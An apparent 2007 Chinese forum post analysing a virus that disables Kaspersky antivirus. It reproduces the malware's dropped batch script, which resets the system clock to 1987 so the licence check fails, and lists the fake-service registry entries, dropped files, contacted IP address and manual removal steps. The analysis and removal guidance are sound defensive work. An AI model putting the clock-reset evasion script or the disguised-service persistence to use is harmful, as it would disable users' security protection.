一个对付卡巴的病毒
卡巴的用户,系统时间全部改为1987-x-x
样本动作
判断用户机子是否装卡巴(KIS/KAV)
如果安装
释放
GoKaba.bat
文件内容
[Copy to clipboard]
CODE:
@echo off
set date=%date%
date 1987-x-x(任意的)
ping -n 45 localhost > nul
date %date%
del %0
=>将系统时间调整为1987-x-x
卡巴的监控立刻失效
成功完成K.O.卡巴后
---------------------------------------------------------------------------------------------
以下为所有机子状况
释放文件
%SystemRoot%\system32\*.EXE
%SystemRoot%\system32\*T.EXE
%SystemRoot%\system32\*.DLL
%SystemRoot%\system32\delme.bat
* =随机8位字母(如7F9DE518\312E0FDA)
注册表变化
添加伪系统服务
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\* "DisplayName" = *
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\* "Description" = 为系统提供加速启动功能(d-sp1)。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\* "ErrorControl" = [REG_DWORD, value: 00000001]
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\* "ImagePath" = C:\WINDOWS\System32\* -service
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\* "ObjectName" = LocalSystem
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\* "Start" = [REG_DWORD, value: 00000002]
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\* "Type" = [REG_DWORD, value: 00000010]
=>sreng显示
[* / *][Running/Auto Start]
<C:\WINNT\system32\*.EXE -service><Microsoft Corporation>
%SystemRoot%\system32\*.EXE
链接网络
地址:61.139.126.62
端口:80
解决方案
1.重启进去安全模式
2.使用Autoruns(下载地址:http://www.sysinternals.com/Files/Autoruns.zip)
打开Autoruns->点击Sevices->对Sevices下的8位字母->右键->Verify(认证)->很容易判断出哪个是病毒文件 (Not Verify)Microsoft Corporation------------------------->
3.记住路径 和 文件名
4.继续用Autoruns 右键点击病毒文件 -> Delecte
5.找到刚记下的目录,删除
c:\windows\system32\*.EXE
c:\windows\system32\*T.EXE
c:\windows\system32\*.DLL
6.如果是卡巴的用户 时间被改到1987-x-x自己手动改回来即可
思考
卡巴一直以来是我们大家公认的"强者",但是树大招风,时间的更改,就直接让卡巴去见阎王,这是为什么?->卡巴过于追求自己的技术,在反盗版应用过于苛刻,如果授权过期,他将停止一切使用,包括主动防御,扫描病毒等等.即使用户使用了离线更新包,卡巴一样哑火.
这是现在一些追求卡巴fans值得思考的问题,同时也是卡巴自己应该反思的最重要的问题
[ 本帖最后由 sddmao 于 2007-4-4 18:22 编辑 ] |
发表于 2007-4-4 14:11:10
楼主
发表于 2007-4-4 18:21:01
